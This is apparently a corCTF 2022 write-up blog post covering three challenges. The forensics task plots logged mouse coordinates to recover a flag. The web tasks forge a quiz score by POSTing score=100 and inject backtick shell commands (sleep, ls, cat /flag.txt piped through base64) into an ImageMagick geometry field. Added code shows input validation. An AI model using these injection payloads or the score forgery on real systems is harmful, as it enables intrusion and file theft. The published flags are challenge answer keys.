はまやんはまやんはまやん

hamayanhamayan's blog

corCTF 2022 writeups

[forensic] whack a frog

Skimming through the capture, there is a long run of requests like GET /anticheat?x=18&y=11&event=mousemove.
I dumped them out and took a look at what the GET requests contain.

GET /anticheat?x=365&y=10&event=mousemove
GET /anticheat?x=295&y=20&event=mousemove
GET /anticheat?x=204&y=31&event=mousemove
GET /anticheat?x=105&y=39&event=mousemove
GET /anticheat?x=82&y=39&event=mousemove
GET /anticheat?x=65&y=37&event=mousemove
GET /anticheat?x=54&y=34&event=mousemove
GET /anticheat?x=50&y=34&event=mousemove
...

Let's colour in the coordinates.

from PIL import Image, ImageDraw

# Black 600x600 canvas; every recorded coordinate fits inside it.
img = Image.new("RGB", (600, 600), (0, 0, 0))

xs = [365,295,204,105,82,65,54,50,39,37,34,33,31,30,26,24,20,19,17,16,16,17,17,18,18,18,18,18,17,17,17,16,16,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,15,16,18,20,21,24,27,30,33,38,42,45,46,47,48,49,50,51,52,54,55,56,57,57,57,57,58,58,59,59,60,60,61,61,62,62,63,64,65,66,69,70,73,76,78,79,80,83,85,86,87,87,88,89,90,92,93,93,95,95,96,97,98,99,99,98,97,97,96,95,94,94,95,95,96,96,97,97,98,98,98,99,100,101,102,102,104,105,106,108,109,114,118,119,120,121,122,124,125,126,127,128,129,130,131,133,134,135,137,137,137,136,134,133,124,121,118,117,115,114,113,113,114,115,115,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,117,117,117,117,117,117,117,117,116,115,114,113,112,111,110,109,108,107,106,105,105,104,104,103,103,103,102,102,103,104,105,107,108,109,110,111,115,116,117,118,119,120,121,121,122,123,124,126,127,130,132,136,137,138,139,139,140,141,142,143,144,145,145,146,147,148,149,150,152,157,162,164,169,172,177,181,182,183,184,184,183,181,179,179,178,178,178,178,178,178,178,178,179,179,179,179,179,179,179,179,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,179,180,182,183,185,185,186,187,187,188,189,190,194,197,201,202,203,204,205,206,207,208,210,211,214,216,217,217,218,219,220,221,222,223,223,224,225,225,226,227,227,228,228,229,230,232,234,236,236,238,239,239,240,240,241,241,241,241,241,241,242,242,242,242,242,242,242,243,243,243,243,243,242,242,241,241,241,240,240,239,239,238,238,238,238,237,237,237,237,237,237,237,237,237,237,236,236,236,236,236,236,235,235,235,235,235,235,235,238,238,239,239,240,240,241,241,245,247,250,251,252,252,253,253,254,255,256,257,257,257,257,257,257,257,256,256,256,256,255,257,257,258,260,262,264,267,268,269,270,270,271,273,274,275,276,276,277,278,278,279,279,279,279,280,280,280,280,280,280,280,279,279,279,278,278,278,277,277,276,274,271,267,264,262,259,258,257,256,255,254,254,255
,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,256,257,258,259,261,264,266,270,273,276,278,279,281,283,285,287,288,289,290,291,293,294,296,297,298,299,301,304,306,309,311,313,315,316,318,319,322,324,325,326,326,326,326,326,324,323,322,322,321,320,320,320,319,319,319,318,317,317,316,316,316,316,316,316,316,316,316,316,316,317,318,319,320,322,323,324,329,330,334,335,336,336,336,336,336,336,336,336,336,336,336,336,337,338,338,339,342,346,348,349,351,352,353,354,354,355,355,355,355,355,355,355,353,353,353,353,353,353,354,355,355,356,357,358,359,359,359,359,360,360,360,360,360,360,360,360,360,360,360,359,359,359,361,361,361,361,360,359,359,359,359,359,358,358,357,356,355,354,353,351,349,347,345,343,337,335,334,330,330,328,327,327,327,326,326,325,325,324,324,324,323,323,322,321,321,320,320,319,319,321,322,322,323,324,325,326,328,329,330,331,332,332,334,337,341,363,373,382,388,389,394,395,395,395,393,392,391,390,389,387,385,384,383,383,383,384,384,385,386,388,388,390,390,391,392,393,395,395,396,396,396,397,397,397,397,396,396,396,396,396,397,397,398,399,401,402,405,406,409,412,415,417,419,420,421,422,423,424,426,428,429,430,431,432,436,437,438,439,440,440,440,440,440,440,440,439,439,439,439,439,439,439,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,439,439,438,437,436,435,433,432,431,430,429,428,427,425,424,423,422,421,419,418,417,416,415,414,412,410,409,408,407,407,406,404,403,402,399,398,397,395,394,394,394,394,395,395,395,396,397,397,397,397,397,397,398,398,398,399,400,401,403,405,407,409,412,419,425,431,436,442,444,446,449,451,452,454,457,460,466,469,471,474,475,476,478,479,479,479,479,479,479,479,479,478,478,478,477,477,476,476,476,476,476,477,477,477,478,478,480,480,480,481,483,484,486,489,492,492,494,495,496,496,496,496,496,496,496,496,497,497,497,497,496,496,496,495,495,495,495,495,495,495,496,496,496,496,498,499,500,501,502,503,504,505,506,507,507,508,509,510,511,512,513,514,515,516,516,516,516,516,515,515
,515,515,515,514,514,514,514,514,514,513,513,513,513,513,512,512,512,511,511,511,511,511,511,512,513,514,515,516,517,518,518,518,518,518,517,516,516,516,516,516,516,516,516,516,516,516,517,517,517,517,517,517,517,517,515,514,512,511,509,508,506,504,502,497,489,484,480,478,477,476,475,474,473,472,471,470,471,472,473,474,475,476,477,477,477,477,477,477,476,476,476,476,474,472,470,467,451,445,440,432,428,416,406,384,381,367,360,335,326,295,268,252,196,167,157,128,107,104,103,101,98,94,90,82,72,69,64,59,57,50,48,42,40,39,37,36,35,33,29,26,20,12,8,10,11,12,13,13,14,15,17,17,17,17,17,17,17,17,17,17,17,17,17,17,18,18,18,18,19,19,19,19,20,20,20,20,20,20,20,20,20,19,19,19,18,18,18,18,18,18,18,18,18,17,17,18,19,20,21,22,23,24,25,26,27,28,29,31,32,33,35,36,37,38,39,40,41,42,43,44,53,58,60,61,63,62,64,68,72,74,81,85,87,88,88,89,90,91,92,93,95,96,97,98,99,101,102,103,104,105,107,107,108,108,108,108,107,107,105,105,105,105,105,105,105,104,103,103,101,100,99,98,97,97,99,100,102,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,135,138,138,138,136,132,131,130,129,127,126,124,123,122,121,121,120,120,119,118,118,118,117,117,115,115,114,114,114,114,114,114,114,113,113,113,113,113,113,113,113,113,113,113,113,113,114,114,115,115,115,116,116,116,117,118,119,120,121,123,124,125,126,127,128,129,130,131,128,127,126,124,123,122,121,120,120,119,118,117,116,115,114,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,99,98,97,100,101,102,103,116,117,119,120,122,124,127,128,129,130,131,132,133,134,134,135,136,137,138,140,143,154,157,165,170,175,180,183,184,184,184,184,183,182,181,180,180,180,180,180,180,179,179,177,177,177,177,177,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,180,180,180,180,180,180,180,180,180,179,179,179,179,179,179,179,179,179,179,179,178,177,177,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,196,198,199,201,202,204,207,208,210,213,214,215,216,217,217,218
,218,218,219,220,220,222,224,225,227,230,233,238,240,242,243,244,244,244,244,244,243,243,242,238,239,240,240,241,241,242,244,244,245,245,246,246,247,248,249,250,253,253,254,254,255,255,258,259,260,261,262,262,263,264,264,265,266,267,267,271,272,273,274,274,275,275,276,275,273,272,272,271,271,271,270,270,269,268,268,267,267,266,266,265,264,264,263,262,262,262,262,262,262,262,262,261,261,261,261,261,261,261,261,261,261,261,261,261,260,260,260,260,260,260,260,259,259,259,261,262,263,264,265,267,268,270,273,275,284,287,293,303,306,307,308,308,309,311,312,313,314,315,316,317,319,320,320,321,319,319,319,319,320,321,321,322,325,325,326,326,327,328,329,329,331,332,334,337,338,338,339,340,341,342,343,343,344,345,346,347,347,348,348,349,349,350,350,351,352,352,353,354,356,357,357,358,358,359,359,359,358,357,357,356,355,354,352,351,350,349,348,347,346,345,343,342,342,341,341,341,341,340,339,337,335,334,333,332,332,331,331,330,330,329,329,328,327,326,325,325,324,324,323,323,321,320,319,318,318,317,317,319,319,320,320,321,322,323,324,327,329,333,335,336,337,338,339,342,343,344,345,346,346,347,348,349,351,352,352,353,354,355,356,356,357,358,358,359,359,360,360,361,362,363,364,365,365,366,367,369,370,371,371,372,373,374,375,376,377,378,379,380,381,382,383,384,384,385,386,387,388,389,390,392,393,394,395,396,398,399,400,401,402,404,406,407,411,413,414,418,420,421,422,423,424,425,427,428,429,429,430,431,432,433,434,435,436,436,437,437,438,438,439,439,439,439,439,439,439,439,439,439,439,439,439,439,439,439,439,439,438,438,438,438,438,438,438,438,438,438,438,438,437,436,435,433,431,430,429,428,427,426,424,420,418,417,413,401,400,399,399,398,398,398,397,397,397,397,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,399,400,403,405,406,408,411,413,465,465,466,467,468,468,469,469,470,470,471,472,474,476,483,485,487,485,484,482,481,480,478,478,481,482,483,484,485,485,487,489,491,493,493,497,498,499,500,502
,504,505,507,509,510,512,513,514,514,515,516,517,517,517,518,518,518,519,519,519,520,518,517,516,515,514,513,511,510,510,509,508,507,506,506,505,504,504,503,502,501,499,498,497,496,496,495,495,494,494,494,494,495,497,500,501,503,505,507,508,509,511,512,513,515,518,518,518,518,518,514,513,510,510,509,509,508,507,507,506,506,506,505,504,504,503,502,502,501,500,500,499,498,494,494,493,492,491,490,490,489,487,487,486,485,485,484,483,482,481,480,480,479,479,478,478,477,477,476,476,475,475,475,474,473,473,471,469,467,445,434,413,393]
ys = [10,20,31,39,39,37,34,34,30,29,26,25,22,21,20,19,18,16,15,14,13,13,12,12,11,10,9,8,8,9,10,12,16,17,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,41,42,45,47,48,49,50,51,53,54,56,57,58,59,60,61,62,64,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,64,63,63,62,61,60,60,59,58,57,56,55,54,52,51,49,45,44,40,37,35,34,33,29,28,26,25,23,21,20,18,17,16,15,14,13,11,10,9,9,8,8,8,9,9,9,9,10,10,9,12,15,16,18,18,20,21,21,21,21,21,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,19,19,19,19,19,23,25,27,28,30,32,32,33,33,32,31,30,29,28,28,31,32,33,34,35,36,37,39,41,42,44,45,46,47,47,48,49,50,51,52,53,54,54,55,55,55,55,55,55,55,55,55,56,56,57,57,58,59,60,61,62,63,63,63,63,63,63,63,63,63,62,62,62,62,62,62,62,63,63,63,63,63,63,64,64,64,64,65,65,65,65,65,64,64,63,63,62,62,61,60,60,59,58,55,53,52,49,48,43,39,38,35,33,31,30,28,26,25,23,21,20,19,17,15,14,13,12,11,10,9,9,13,14,15,16,18,22,24,25,26,27,28,29,30,31,32,33,34,35,39,40,42,45,46,48,50,51,52,54,55,56,57,58,59,59,59,59,59,59,60,60,60,61,61,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,61,60,60,59,59,58,58,58,57,57,57,56,56,55,54,54,52,51,50,49,47,46,45,44,43,43,42,41,40,39,38,37,36,35,33,32,31,30,29,28,27,26,25,24,23,22,21,20,20,19,19,18,18,17,16,15,15,14,14,16,17,18,19,20,21,19,18,17,16,15,14,13,12,11,10,9,9,13,14,19,20,21,22,23,24,25,26,30,31,33,34,35,34,34,33,33,32,32,32,32,33,34,35,36,37,37,38,39,40,41,39,39,38,35,34,32,30,29,28,27,26,24,23,22,21,21,20,19,18,17,16,15,14,13,13,12,11,11,14,15,16,17,18,19,19,20,20,20,21,23,25,27,32,35,38,41,43,44,46,47,48,49,49,49,50,51,52,53,54,55,56,57,58,59,60,61,62,62,62,62,61,60,59,58,57,56,55,54,54,53,52,52,51,50,50,50,50,49,48,48,47,46,46,45,44,44,43,41,40,39,38,37,36,35,34,32,30,29,28,27,26,25,23,21,21,20,19,19,18,17,17,16,15,14,13,12,12,11,10,10,13,14,15,16,18,19,19,20,21,22,23,24,26,27,32,34,37,39,39,40,38,37,36,35,34,33,33,41,42,43,44,45,45,46,47,50,52,53,55,56,58,59,60,60,59,58,57,56,55,55,61,62,63,63,60,54,51,48
,45,42,40,35,33,30,28,26,24,23,22,20,19,17,16,15,13,12,11,10,9,8,9,10,11,12,14,16,17,18,19,19,19,20,21,23,23,24,26,27,29,31,32,34,39,41,42,46,45,48,49,50,51,52,53,54,54,54,55,56,56,57,58,59,60,61,62,62,62,61,61,60,60,59,59,58,57,57,56,55,54,53,52,50,49,46,44,39,35,33,31,30,29,28,26,26,26,26,26,26,26,26,26,25,24,24,23,23,22,22,21,21,20,20,19,18,18,17,17,16,15,15,14,13,12,12,11,10,9,9,16,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,18,18,18,18,18,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,36,37,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,58,59,59,59,60,60,61,61,61,61,61,61,62,62,62,63,63,63,63,63,63,64,64,64,64,64,64,64,64,65,65,65,65,65,65,65,65,65,65,64,63,62,62,61,60,58,56,53,52,51,50,49,48,47,47,47,46,45,45,44,43,43,41,39,38,38,37,36,36,36,35,35,34,34,33,33,32,30,30,28,27,26,24,23,22,21,20,19,18,17,16,16,15,14,13,12,12,11,11,13,14,15,16,17,18,19,22,23,23,24,26,27,29,31,33,34,34,35,35,35,36,37,38,39,40,42,42,43,44,45,43,41,41,39,38,37,36,34,33,33,33,34,44,44,45,46,46,47,48,48,49,50,51,52,53,53,54,55,55,56,56,57,57,57,58,56,55,54,54,54,55,56,58,60,61,62,63,64,65,65,64,63,63,62,61,58,57,54,52,51,49,46,44,41,39,35,34,31,30,28,26,23,22,21,20,20,19,18,17,16,15,14,13,12,11,11,12,13,15,16,17,18,18,19,21,22,22,23,24,26,27,28,30,33,38,41,45,46,47,49,51,52,53,55,56,58,58,58,58,58,58,58,58,57,56,56,59,60,60,61,62,62,62,62,61,60,58,58,58,58,58,58,57,56,55,53,52,48,46,42,40,39,36,34,33,32,31,32,32,32,31,29,27,26,25,25,24,23,23,21,21,19,19,19,18,18,18,18,16,15,13,11,14,14,14,14,14,13,13,13,12,14,16,17,18,19,21,22,23,24,25,26,27,28,31,32,33,34,34,35,36,37,37,38,39,40,41,42,43,44,45,45,46,47,48,49,50,51,52,53,54,55,56,59,61,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,64,64,64,64,64,64,64,64,65,65,64,63,63,62,62,62,62,61,61,60,60,59,59,58,58,58,58,58,58,57,57,57,56,56,56,55,55,54,53,51,50,49,48,47,45,44,42,34,33,31,28,24,23,21,21,19,18,18,17,17,17,17,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,19,19,19,
19,19,19,19,19,19,20,20,21,21,21,21,22,22,22,22,23,23,22,22,21,20,21,22,23,25,26,34,36,37,38,39,40,41,42,43,43,44,45,46,47,48,49,50,51,52,53,54,56,57,58,59,60,61,63,64,64,64,64,64,64,64,64,65,65,65,65,65,65,65,65,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,66,66,66,66,66,66,66,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,67,67,66,66,64,63,58,56,53,51,48,44,40,37,35,34,32,29,27,27,27,26,25,24,23,22,21,20,17,16,16,18,19,27,28,29,30,31,32,33,35,36,37,38,39,40,41,42,43,44,45,45,46,47,48,49,50,51,52,53,53,54,55,56,57,58,60,61,62,63,63,63,63,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,65,65,65,65,65,65,65,65,65,65,64,63,62,62,61,58,56,55,53,51,47,44,42,40,37,35,34,32,31,29,24,22,22,18,20,21,22,23,24,25,27,28,28,29,30,31,32,32,33,34,35,36,36,37,37,38,39,38,38,37,36,36,35,34,33,32,32,31,29,26,25,25,24,23,23,22,22,24,27,28,29,29,30,31,31,32,33,34,35,35,36,36,37,38,38,39,39,39,40,41,42,43,44,45,46,46,47,48,49,50,51,52,53,54,55,56,57,58,58,59,60,61,62,63,64,64,64,63,60,58,57,56,55,54,53,51,49,47,42,41,38,34,33,32,31,30,30,28,27,26,25,24,23,23,21,21,20,20,18,17,19,20,22,23,24,25,28,29,30,31,31,33,34,35,36,37,39,41,41,42,43,43,44,45,45,46,46,47,48,48,49,49,50,50,51,51,52,53,54,55,55,56,58,58,59,60,61,62,63,64,63,63,62,62,61,61,59,59,58,57,57,56,55,54,52,51,50,48,47,46,45,44,42,42,44,45,45,46,47,47,48,48,49,49,50,50,52,54,55,56,57,58,58,59,62,63,64,65,66,66,67,66,65,65,64,63,62,61,60,58,56,53,51,50,49,48,47,43,42,41,40,39,38,36,36,35,33,32,31,30,30,29,28,27,25,24,23,21,20,18,17,17,17,17,17,17,18,18,18,18,18,18,19,19,19,19,19,19,19,19,19,19,19,19,19,19,18,18,18,18,18,17,17,17,16,16,16,17,18,18,18,18,18,18,18,17,17,17,17,17,16,16,16,15,15,15,15,15,15,14,14,14,14,14,14,14,15,16,17,19,21,22,23,24,32,33,34,36,37,38,39,41,42,43,45,46,47,48,49,50,51,52,53,54,55,56,57,58,60,61,62,63,63,63,63,63,63,63,63,63,63,63,63,64,64,64,64,65,65,64,63,62,61,60,60,59,58,57,55,54,53,52,50,49,48,47,46,45,44,43,42,41,40,39,38,37
,36,35,34,33,32,31,30,29,28,27,26,25,24,23,23,22,20,19,18,16,14,12,10,9,9,11,12,14,15,16,16,17,17,18,18,19,19,20,22,22,23,23,22,22,22,21,20,20,23,24,25,26,26,27,29,30,32,34,35,39,40,41,42,43,45,45,46,47,49,49,50,50,51,52,53,55,56,57,57,58,59,59,60,61,61,61,60,60,59,58,58,57,57,56,56,56,55,55,54,53,53,52,52,51,49,47,47,46,46,45,45,44,44,43,43,42,41,40,38,37,35,31,29,29,27,26,25,24,22,19,18,17,16,16,23,23,26,27,28,29,30,30,31,31,32,33,34,34,35,36,37,38,39,39,40,40,41,45,46,47,48,49,50,51,52,53,54,55,55,56,57,58,59,60,60,61,61,62,63,64,64,65,65,66,66,67,67,67,66,65,64,63,61,44,37,23,12]

draw = ImageDraw.Draw(img)

# One yellow pixel per recorded mouse position.
for x, y in zip(xs, ys):
    draw.point((x, y), fill=(255, 255, 0))

img.save("out.png")

Letters emerge, so I fit them to the flag format and submit that as the flag.

corctf{LILYXOX}
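As an added example that is not part of the original post: rather than hand-copying the coordinates into xs/ys, the request lines can be parsed straight out of the dump and the canvas sized to the data. The log below is constructed; the `/anticheat` path and the `event` parameter are the ones seen in the capture above.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Constructed sample in the shape of the capture above, with a click event, an unrelated request and a malformed coordinate mixed in.
SAMPLE_LOG = """\
GET /anticheat?x=365&y=10&event=mousemove
GET /anticheat?x=295&y=20&event=mousemove
GET /anticheat?x=204&y=31&event=mousemove
GET /anticheat?x=105&y=39&event=mousedown
GET /index.html
GET /anticheat?x=oops&y=39&event=mousemove
GET /anticheat?x=82&y=39&event=mousemove
"""

REQUEST_LINE = re.compile(r"^GET\s+(\S+)")

def extract_points(log_text, event="mousemove"):
    """(x, y) integer pairs from every /anticheat request carrying `event`."""
    points = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.match(line.strip())
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != "/anticheat":
            continue
        qs = parse_qs(url.query)
        if qs.get("event", [None])[0] != event:
            continue
        try:
            points.append((int(qs["x"][0]), int(qs["y"][0])))
        except (KeyError, ValueError):
            continue  # missing or non-numeric coordinate: skip the line
    return points

def bounds(points):
    """Bounding box (min_x, min_y, max_x, max_y), used to size the canvas to the data."""
    xs, ys = [p[0] for p in points], [p[1] for p in points]
    return min(xs), min(ys), max(xs), max(ys)

def render(points, path="out.png", margin=5, scale=4):
    """Plot the points on a black canvas, scaled up so the glyphs are legible."""
    from PIL import Image, ImageDraw  # lazy import: parsing above works without Pillow
    _, _, x1, y1 = bounds(points)
    img = Image.new("RGB", ((x1 + 2 * margin) * scale, (y1 + 2 * margin) * scale), (0, 0, 0))
    draw = ImageDraw.Draw(img)
    for x, y in points:
        px, py = (x + margin) * scale, (y + margin) * scale
        draw.rectangle([px, py, px + scale - 1, py + scale - 1], fill=(255, 255, 0))
    img.save(path)
    return path
```

`render(extract_points(open("dump.txt").read()))` is the whole pipeline on a real dump.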

[web] jsonquiz

A JSON quiz site comes up.
Doing it properly looks like a lot of work.

Looking through the proxy log, there is a file /assets/js/quiz.js.
It contains

fetch("/submit", {
    method: "POST",
    headers: {
        "Content-Type": "application/x-www-form-urlencoded"
    },
    body: "score=" + score
});

so it seems the result is POSTed to /submit.

I just sent POST /submit with score=100 to claim a perfect score, and the flag came back.

corctf{th3_linkedin_JSON_quiz_is_too_h4rd!!!}

[web] msfrog generator

There don't seem to be many points to attack.
The GET / response contains <!-- NOTE: There is no (intended) vuln in the frontend, please don't waste your time digging into the JS ;) -->, so I'll take the hint and look at POST /api/generate instead.

Let's put a string into a coordinate like this and see what error comes out.
[{"type":"msnose.png","pos":{"x":"bad","y":0}}]

Something went wrong :
b"convert-im6.q16: invalid argument for option `-geometry': +bad+0 @ error/convert.c/ConvertImageCommand/1672.\n"

Googling the message, this is ImageMagick.
Command injection, maybe?

[{"type":"msnose.png","pos":{"x":"`sleep 10`","y":0}}]

Sending that caused a 10 second wait, so it seems to be working.
I wanted to get the output back via an HTTP request, but it wouldn't go through, so maybe the box isn't connected to the internet.

Looking closely, the input is echoed back inside the error message, so that can be used to pull information out.

Setting the "x" part to

"x":"`ls -la | base64`"

gave me the base64-encoded result, though there seems to be a cap on the number of output characters.
Still, it was enough to get the flag.

"x":"`ls / | base64`"

shows that there is a /flag.txt.

"x":"`cat /flag.txt | base64`"

gets the flag.

corctf{sh0uld_h4ve_r3nder3d_cl13nt_s1de_:msfrog:}
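The root cause above is user input reaching a shell that builds the convert command, with stderr echoed back to the client. As an added example (not the challenge's code, whose server source isn't shown), here is how a generator of the same shape could validate the layer JSON and run convert from an argument list instead; the asset allow-list, the base/output filenames and the argv layout are my assumptions.

```python
import subprocess

class BadLayer(ValueError):
    """Raised for any layer that does not match the expected schema."""

# Hypothetical asset allow-list; only msnose.png is known from the page.
ALLOWED_TYPES = {"msnose.png"}

def geometry(pos):
    """Return the '+X+Y' value for -geometry, accepting only plain ints in range.
    Anything else (a string such as "bad", a bool, a float) is rejected before any command is built."""
    if not isinstance(pos, dict):
        raise BadLayer("pos must be an object")
    x, y = pos.get("x"), pos.get("y")
    if type(x) is not int or type(y) is not int:  # `type is` also excludes bool
        raise BadLayer("coordinates must be integers")
    if not (0 <= x <= 4096 and 0 <= y <= 4096):
        raise BadLayer("coordinates out of range")
    return f"+{x}+{y}"

def build_argv(layers, base="base.png", out="out.png"):
    """argv for convert(1) as a list: no shell is involved, so no shell syntax is ever interpreted."""
    argv = ["convert", base]
    for layer in layers:
        if not isinstance(layer, dict) or layer.get("type") not in ALLOWED_TYPES:
            raise BadLayer("unknown layer type")
        argv += [layer["type"], "-geometry", geometry(layer.get("pos")), "-composite"]
    argv.append(out)
    return argv

def accepts(layers):
    """True if the request passes validation; handy for tests and for rejecting early."""
    try:
        build_argv(layers)
        return True
    except BadLayer:
        return False

def generate(layers):
    """Validate, run convert without a shell, and never echo stderr back to the client."""
    try:
        argv = build_argv(layers)
    except BadLayer as e:
        return 400, f"invalid request: {e}"
    proc = subprocess.run(argv, capture_output=True)
    if proc.returncode != 0:
        print("convert failed:", proc.stderr.decode(errors="replace"))  # server-side log only
        return 500, "Something went wrong"
    return 200, "ok"
```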